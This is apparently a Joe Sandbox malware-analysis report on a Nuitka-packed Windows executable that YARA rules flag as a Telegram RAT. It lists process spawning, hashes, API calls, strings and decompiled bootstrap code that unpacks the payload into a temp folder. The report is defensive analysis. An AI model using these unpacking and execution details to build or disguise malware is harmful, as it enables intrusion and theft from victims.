Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	9'737'728 bytes
MD5 hash:	BA25C8AF9DD114244EC83C9F6B0D12EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: test.exePID: 6884, Parent PID: 6860

General

Target ID:	2
Start time:	13:40:00
Start date:	01/09/2023
Path:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552
Imagebase:	0x400000
File size:	9'737'728 bytes
MD5 hash:	BA25C8AF9DD114244EC83C9F6B0D12EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: test.exePID: 6892, Parent PID: 6860

General

Target ID:	3
Start time:	13:40:00
Start date:	01/09/2023
Path:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716
Imagebase:	0x400000
File size:	9'737'728 bytes
MD5 hash:	BA25C8AF9DD114244EC83C9F6B0D12EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: test.exePID: 6912, Parent PID: 6860

General

Target ID:	4
Start time:	13:40:01
Start date:	01/09/2023
Path:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636
Imagebase:	0x400000
File size:	9'737'728 bytes
MD5 hash:	BA25C8AF9DD114244EC83C9F6B0D12EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: test.exePID: 6928, Parent PID: 6860

General

Target ID:	5
Start time:	13:40:01
Start date:	01/09/2023
Path:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640
Imagebase:	0x400000
File size:	9'737'728 bytes
MD5 hash:	BA25C8AF9DD114244EC83C9F6B0D12EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: test.exePID: 6944, Parent PID: 6860

General

Target ID:	6
Start time:	13:40:02
Start date:	01/09/2023
Path:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736
Imagebase:	0x400000
File size:	9'737'728 bytes
MD5 hash:	BA25C8AF9DD114244EC83C9F6B0D12EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7004, Parent PID: 6892

General

Target ID:	7
Start time:	13:40:03
Start date:	01/09/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff7a8120000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7012, Parent PID: 7004

General

Target ID:	8
Start time:	13:40:03
Start date:	01/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0xbf0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7044, Parent PID: 6892

General

Target ID:	9
Start time:	13:40:03
Start date:	01/09/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff7a8120000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7052, Parent PID: 7044

General

Target ID:	10
Start time:	13:40:03
Start date:	01/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6bab10000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 6828, Parent PID: 3512COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	65.1%
Total number of Nodes:	332
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0041DFE0 Relevance: 133.6, APIs: 53, Strings: 23, Instructions: 584
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0041E008
SetConsoleCtrlHandler.KERNEL32 ref: 0041E043
CreateDirectoryW.KERNELBASE ref: 0041E066
CreateFileW.KERNELBASE ref: 0041E0A9
SetFilePointer.KERNELBASE ref: 0041E0D4
SetFilePointer.KERNELBASE ref: 0041E0F1
ReadFile.KERNELBASE ref: 0041E134
SetFilePointer.KERNELBASE ref: 0041E160
ReadFile.KERNELBASE ref: 0041E189
malloc.MSVCRT ref: 0041E1C7
malloc.MSVCRT ref: 0041E1E1
malloc.MSVCRT ref: 0041E1FB
GetLastError.KERNEL32 ref: 0041E557
FormatMessageA.KERNEL32 ref: 0041E58B
puts.MSVCRT ref: 0041E598
puts.MSVCRT ref: 0041E5A5
GetLastError.KERNEL32 ref: 0041E848
FormatMessageA.KERNEL32 ref: 0041E87C
puts.MSVCRT ref: 0041E896

Part of subcall function 0041DCF0: _wcsicmp.MSVCRT ref: 0041DD66
Part of subcall function 0041DCF0: _wcsicmp.MSVCRT ref: 0041DD7D
Part of subcall function 0041DCF0: _wcsicmp.MSVCRT ref: 0041DD94
Part of subcall function 0041DCF0: _wcsicmp.MSVCRT ref: 0041DDAB

_assert.MSVCRT ref: 0041E8FA
_assert.MSVCRT ref: 0041E919
_assert.MSVCRT ref: 0041E940
_assert.MSVCRT ref: 0041E967
_assert.MSVCRT ref: 0041E98E
_assert.MSVCRT ref: 0041E9C1
_assert.MSVCRT ref: 0041E9E0
_assert.MSVCRT ref: 0041E9FF
GetLastError.KERNEL32 ref: 0041EA0A
FormatMessageA.KERNEL32 ref: 0041EA3E
puts.MSVCRT ref: 0041EA4B
puts.MSVCRT ref: 0041EA58
_assert.MSVCRT ref: 0041EA7B
_assert.MSVCRT ref: 0041EA9A
_assert.MSVCRT ref: 0041EAC4
puts.MSVCRT ref: 0041EAF5
_putws.MSVCRT ref: 0041EB01
abort.MSVCRT ref: 0041EB07
_assert.MSVCRT ref: 0041EB4B

Strings

dctx != NULL, xrefs: 0041EAB2
static_src\OnefileBootstrap.c, xrefs: 0041E530, 0041E8EC, 0041E90B, 0041E932, 0041E959, 0041E980, 0041E9B3, 0041E9D2, 0041E9F1, 0041EA6D, 0041EA8C, 0041EAAB, 0041EAD5, 0041EB3D
read_size == size, xrefs: 0041E960, 0041E987
header[0] == 'K', xrefs: 0041E939
Y, xrefs: 0041E91F
header[1] == 'A', xrefs: 0041E912
A, xrefs: 0041E946
Error, failed to locate onefile filename., xrefs: 0041E882
Error, failed to access unpacked executable., xrefs: 0041EA44
%TEMP%\onefile_%PID%_%TIME%, xrefs: 0041E01C, 0041EAFA
Error, failed to open '%ls' for writing., xrefs: 0041EB1E
bool_res, xrefs: 0041E537, 0041E9BA, 0041E9D9, 0041E9F8
input.src, xrefs: 0041EB44
C:\Users\user\AppData\Local\Temp\\onefile_6828_133380419975826539\lib2to3\PatternGrammar3.9.10.final.0.pickle, xrefs: 0041E349, 0041E36A, 0041E3C6, 0041E404, 0041E498, 0041E5CE, 0041E624, 0041E662, 0041E6E7, 0041E8C0, 0041E8DA, 0041EB17
output.dst, xrefs: 0041EADC
Error, couldn't runtime expand temporary directory pattern:, xrefs: 0041EAEE
NUITKA_ONEFILE_PARENT, xrefs: 0041E753
h, xrefs: 0041E76A
K, xrefs: 0041E96D
C:\Users\user\AppData\Local\Temp\\onefile_6828_133380419975826539\test.exe, xrefs: 0041E6EE, 0041E797
res != INVALID_SET_FILE_POINTER, xrefs: 0041EA74, 0041EA93
header[2] == 'Y', xrefs: 0041E8F3
Error, failed to register signal handler., xrefs: 0041E591

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert$File$puts$_wcsicmp$ErrorFormatLastMessagePointermalloc$CreateRead$ConsoleCtrlDirectoryHandlerModuleName_putwsabort
String ID: %TEMP%\onefile_%PID%_%TIME%$A$C:\Users\user\AppData\Local\Temp\\onefile_6828_133380419975826539\lib2to3\PatternGrammar3.9.10.final.0.pickle$C:\Users\user\AppData\Local\Temp\\onefile_6828_133380419975826539\test.exe$Error, couldn't runtime expand temporary directory pattern:$Error, failed to access unpacked executable.$Error, failed to locate onefile filename.$Error, failed to open '%ls' for writing.$Error, failed to register signal handler.$K$NUITKA_ONEFILE_PARENT$Y$bool_res$dctx != NULL$h$header[0] == 'K'$header[1] == 'A'$header[2] == 'Y'$input.src$output.dst$read_size == size$res != INVALID_SET_FILE_POINTER$static_src\OnefileBootstrap.c
API String ID: 744075496-1582612310
Opcode ID: 414c670b492e4177598348cf41a1ed05a591f45dafb3f4d0dd0dd20609068bcc
Instruction ID: a14fe6a1412863909f9cdff3acdb236635e569fb62c6e85c8c4f2b38795099ef
Opcode Fuzzy Hash: 414c670b492e4177598348cf41a1ed05a591f45dafb3f4d0dd0dd20609068bcc
Instruction Fuzzy Hash: 354270B5714A41C5EB249F12F9543AA3770FB80B88F845126EF8D477A4EB7CCA89C709

Uniqueness

Uniqueness Score: -1.00%

Function 0040114B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E0040114B(void* __r8) {
				long long _v16;
				signed long long _v20;
				long long _v24;
				void* _v32;
				long long _v40;
				long long _v44;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				void* _v88;
				long long _v96;
				void* _v136;
				signed int _v140;
				char _v200;
				_Unknown_base(*)()* _t59;
				void* _t61;
				signed char _t62;
				void* _t65;
				void* _t69;
				char* _t89;
				long long _t96;
				long long* _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t111;
				intOrPtr _t113;
				intOrPtr* _t114;
				long long _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				signed long long _t123;
				long long _t139;
				long long* _t142;
				long long* _t143;
				void* _t146;
				signed long long _t147;
				intOrPtr _t148;
				intOrPtr _t153;
				long long* _t159;
				intOrPtr _t160;
				long long _t162;
				intOrPtr _t163;
				void* _t174;

				_v16 = 0;
				_v20 = 0;
				_t89 =  &_v200;
				r8d = 0x68;
				 *(_t89 + 2) =  *(_t89 + 2) & _t147;
				 *((intOrPtr*)(_t89 - 0x75)) =  *((intOrPtr*)(_t89 - 0x75)) + _t69;
				if( *((intOrPtr*)(_t89 + 0x29e2a)) != 0) {
					GetStartupInfoA();
				}
				_v32 = 0;
				_v44 = 0x30;
				_v56 =  *[gs:rax];
				_v40 =  *((intOrPtr*)(_v56 + 8));
				_v24 = 0;
				while(1) {
					_t96 =  *0x42aee0; // 0x43fc78
					_v64 = _t96;
					_v72 = _v40;
					_v80 = 0;
					_t148 = _v72;
					asm("lock dec eax");
					_v32 = _v80;
					if(_v32 == 0) {
						break;
					}
					_t99 = _v32;
					if(_t99 != _v40) {
						asm("repne add eax, [eax]");
						 *_t99();
						continue;
					}
					_v24 = 1;
					break;
				}
				_t100 =  *0x42aef0; // 0x43fc70
				if( *_t100 != 1) {
					_t102 =  *0x42aef0; // 0x43fc70
					if( *_t102 != 0) {
						 *0x430024 = 1;
					} else {
						_t143 =  *0x42aef0; // 0x43fc70
						 *_t143 = 1;
						_t148 =  *0x42af30; // 0x441018
						L00425A20();
					}
				} else {
					_t148 = 0x1f;
				}
				_t104 =  *0x42aef0; // 0x43fc70
				if( *_t104 == 1) {
					_t148 =  *0x42af10; // 0x441000
					L00425A20();
					_t142 =  *0x42aef0; // 0x43fc70
					 *_t142 = 2;
				}
				if(_v24 == 0) {
					_t139 =  *0x42aee0; // 0x43fc78
					_v88 = _t139;
					_v96 = 0;
					 *_v88 = _v96;
				}
				_t106 =  *0x42ae20; // 0x42a7a8
				if( *_t106 != 0) {
					r8d = 0;
					dil = dil + dil;
				}
				E0041F66E(_t69, _t146, _t148, _t174);
				_t59 = SetUnhandledExceptionFilter(??);
				_t159 =  *0x42aea0; // 0x43f1d0
				 *_t159 = SetUnhandledExceptionFilter;
				_t61 = E0041EF10(E00426140(_t59, 0x401000));
				_t160 =  *0x42ae40; // 0x400000
				 *0x43fc68 = _t160;
				_t62 = E004262B0(_t61);
				_v16 =  *0x43fc68;
				if(_v16 == 0) {
					L31:
					_t111 =  *0x42afb0; // 0x43f190
					if( *_t111 != 0) {
						if((_v140 & 0x00000001) == 0) {
							_t123 = 0xa;
						} else {
							_t123 = _t62 & 0x0000ffff;
						}
						 *0x427000 = _t123;
					}
					_t113 =  *0x430004; // 0x1
					E00401576(_t69, _t113, 0x430008);
					E0041EC84();
					_t114 =  *0x42ae60; // 0x440458
					_t162 =  *0x430010; // 0x1d1a70
					 *((long long*)( *_t114)) = _t162;
					_t153 =  *0x430010; // 0x1d1a70
					_t163 =  *0x430008; // 0x1d17b0
					_t116 =  *0x430004; // 0x1
					_t65 = E0041EB80(_t69, _t163, _t153); // executed
					 *0x43001c = _t116;
					_t117 =  *0x430020; // 0x0
					if(_t117 == 0) {
						exit();
					}
					_t118 =  *0x430024; // 0x0
					if(_t118 == 0) {
						L00425A30();
					}
					return _t65;
				} else {
					L23:
					while(1) {
						if(_t62 > 0x20) {
							L20:
							if(_t62 == 0x22) {
								_t62 = _t62 & 0xffffff00 | _v20 == 0x00000000;
								_v20 = _t62 & 0x000000ff;
							}
							_v16 = _v16 + 1;
							continue;
						}
						if(_t62 == 0) {
							L28:
							while(_t62 != 0 && _t62 <= 0x20) {
								_v16 = _v16 + 1;
							}
							 *0x43fc60 = _v16;
							goto L31;
						}
						if(_v20 != 0) {
							goto L20;
						}
						goto L28;
					}
				}
			}

0x00401156
0x0040115e
0x00401165
0x0040116c
0x0040117b
0x0040117e
0x0040118a
0x0040119d
0x0040119d
0x0040119f
0x004011a7
0x004011b5
0x004011c1
0x004011c5
0x004011ef
0x004011ef
0x004011f6
0x004011fe
0x00401202
0x0040120a
0x00401216
0x0040121b
0x00401224
0x00000000
0x00000000
0x004011ce
0x004011d6
0x004011ea
0x004011ed
0x00000000
0x004011ed
0x004011d8
0x00000000
0x004011d8
0x00401226
0x00401232
0x00401240
0x0040124b
0x0040126f
0x0040124d
0x0040124d
0x00401254
0x00401261
0x00401268
0x00401268
0x00401234
0x00401234
0x0040123f
0x00401279
0x00401285
0x0040128e
0x00401295
0x0040129a
0x004012a1
0x004012a1
0x004012ab
0x004012ad
0x004012b4
0x004012b8
0x004012c8
0x004012cb
0x004012cc
0x004012d9
0x004012e5
0x004012f4
0x004012f6
0x004012f7
0x0040130a
0x0040130c
0x00401313
0x00401322
0x0040132e
0x00401335
0x00401338
0x00401340
0x00401349
0x004013b1
0x004013b1
0x004013bc
0x004013c9
0x004013d4
0x004013cb
0x004013cf
0x004013cf
0x004013d9
0x004013d9
0x004013df
0x004013ee
0x004013f3
0x004013f8
0x00401402
0x00401409
0x0040140c
0x00401413
0x0040141a
0x00401425
0x0040142a
0x00401430
0x00401438
0x00401442
0x00401442
0x00401447
0x0040144f
0x00401451
0x00401451
0x00401464
0x0040134b
0x00000000
0x0040136a
0x00401373
0x0040134d
0x00401356
0x0040135c
0x00401362
0x00401362
0x00401365
0x00000000
0x00401365
0x0040137e
0x00000000
0x0040138d
0x00401388
0x00401388
0x004013ae
0x00000000
0x004013ae
0x00401384
0x00000000
0x00000000
0x00000000
0x00401386
0x0040136a

APIs

_amsg_exit.MSVCRT ref: 00401239
_initterm.MSVCRT ref: 00401268
_initterm.MSVCRT ref: 00401295
exit.MSVCRT ref: 00401442
_cexit.MSVCRT ref: 00401451

Strings

0, xrefs: 004011A7

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _initterm$_amsg_exit_cexitexit
String ID: 0
API String ID: 602970348-4108050209
Opcode ID: 95c85ffd74f471e3a6c57b785d61bda13fdfcbadebfb8966d4dede3a5d7214a1
Instruction ID: feb18f318085db8bd0774120bb760b637bf2ddcdb530bbfed48519118d8c5173
Opcode Fuzzy Hash: 95c85ffd74f471e3a6c57b785d61bda13fdfcbadebfb8966d4dede3a5d7214a1
Instruction Fuzzy Hash: 70911AB6700B148AFB10CFA6E89036D37B1B348B98F804066DE4CA7BA4DB7DC591C719

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD30 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_assert.MSVCRT ref: 0041CDB6
SetFilePointer.KERNELBASE ref: 0041CDD5
ReadFile.KERNELBASE ref: 0041CE19
_assert.MSVCRT ref: 0041CE41
memcpy.MSVCRT ref: 0041CE8D

Strings

static_src\OnefileBootstrap.c, xrefs: 0041CDA8, 0041CE33, 0041CF1E, 0041CF46
read_size == size, xrefs: 0041CE3A
input.size == input.pos, xrefs: 0041CDAF
!ZSTD_isError(ret), xrefs: 0041CF25
bool_res, xrefs: 0041CF4D

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File_assert$PointerReadmemcpy
String ID: !ZSTD_isError(ret)$bool_res$input.size == input.pos$read_size == size$static_src\OnefileBootstrap.c
API String ID: 484253220-1931691333
Opcode ID: b9ea28d8736a0e5036b4240669dfc799281ea6a91fee214d8acdcdd65b664015
Instruction ID: 46ab9e11137d0ef07e86611a1fb98982e15db0f42cf3c2686a69e893392272a6
Opcode Fuzzy Hash: b9ea28d8736a0e5036b4240669dfc799281ea6a91fee214d8acdcdd65b664015
Instruction Fuzzy Hash: 5D5158B1B50A41C0EB108B2AFD807922361B759B98F84A136DF6C07775DB3CCA89C348

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406580 Relevance: 108.2, APIs: 41, Strings: 20, Instructions: 1437COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00406700
_assert.MSVCRT ref: 00406AD4
_assert.MSVCRT ref: 00406AF4

Strings

op != NULL, xrefs: 00407904, 00407B4A
oLitEnd < oMatchEnd, xrefs: 00407885, 00407A42
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h, xrefs: 00407623, 00407A8D, 00407AB5, 00407C75, 00407C96, 00407E81, 00407EB9, 00407F8A, 004080BF, 00408101
oMatchEnd <= oend, xrefs: 00407855, 00407A12
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00406DB4, 00406DF4, 00406E44, 00407710, 004077B6, 004077F6
dst != NULL, xrefs: 00406AED
op <= oMatchEnd, xrefs: 004078AD, 00407A6D
*op - *ip >= 8, xrefs: 00408065, 0040813D
sequence.matchLength >= 1, xrefs: 0040751C, 00407574
diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN, xrefs: 00407A94, 00407C9D, 00407EC0, 004080C6
nbBits < BIT_MASK_SIZE, xrefs: 00406DC1, 00406E01, 00406E5B, 0040771D, 004077BD, 004077FD
op <= oLitEnd, xrefs: 00406C0C, 004072E9
ofBits <= MaxOff, xrefs: 00406F0D, 004078DD
*ip <= *op, xrefs: 0040808C, 0040816B
diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN), xrefs: 0040762A, 00407ABC, 00407C7C, 00407E8D, 00407F91, 00408110
iend >= ip, xrefs: 00406ACD
op < oMatchEnd, xrefs: 00407E52, 0040820A
match >= prefixStart, xrefs: 004074F9, 00407551
oLitEnd <= oend_w, xrefs: 0040782D, 004079E2
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00406AC6, 00406AE6, 00406C05, 00406F00, 004072E2, 004074F2, 00407515, 0040754A, 0040756D, 00407826, 0040784E, 0040787E, 004078A6, 004078D6, 004078FD, 004079DB, 00407A0B, 00407A3B, 00407A66, 00407B43, 00407E4B, 0040805E, 00408085, 00408136, 00408164, 004081FE

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert$memcpy
String ID: *ip <= *op$*op - *ip >= 8$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN)$diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN$dst != NULL$iend >= ip$match >= prefixStart$nbBits < BIT_MASK_SIZE$oLitEnd < oMatchEnd$oLitEnd <= oend_w$oMatchEnd <= oend$ofBits <= MaxOff$op != NULL$op < oMatchEnd$op <= oLitEnd$op <= oMatchEnd$sequence.matchLength >= 1
API String ID: 3718630003-2492470846
Opcode ID: 2e6dd685fc58eae38ee08dfe6f1cc87013295e9e83047af6310e08f6aa03d75f
Instruction ID: 8d56605cce46fe981946306b76697e88c631fad4f9d5bcefb4973dfa5ef7bd3a
Opcode Fuzzy Hash: 2e6dd685fc58eae38ee08dfe6f1cc87013295e9e83047af6310e08f6aa03d75f
Instruction Fuzzy Hash: 83E26A72B09BC586DA20CF19E44039EB761F384B84F958126DB8D17BA8DF7CD599CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040520B Relevance: 67.1, APIs: 20, Strings: 18, Instructions: 617
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 0040526D
_assert.MSVCRT ref: 00405418
_assert.MSVCRT ref: 0040543B
memcpy.MSVCRT ref: 0040571E

Strings

op != NULL, xrefs: 00405664
oLitEnd < oMatchEnd, xrefs: 004055FD
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h, xrefs: 0040573D, 00405754, 00405842, 00405ADC, 00405B1F
oMatchEnd <= oend, xrefs: 004055DD
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00405506, 00405534, 00405574
op <= oMatchEnd, xrefs: 0040561D
*op - *ip >= 8, xrefs: 00405A56
sequence.matchLength >= 1, xrefs: 00405434
diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN, xrefs: 0040575B, 00405AE3
nbBits < BIT_MASK_SIZE, xrefs: 0040550D, 00405549, 00405589
op <= oLitEnd, xrefs: 004051C9
ofBits <= MaxOff, xrefs: 0040563D
*ip <= *op, xrefs: 00405A32
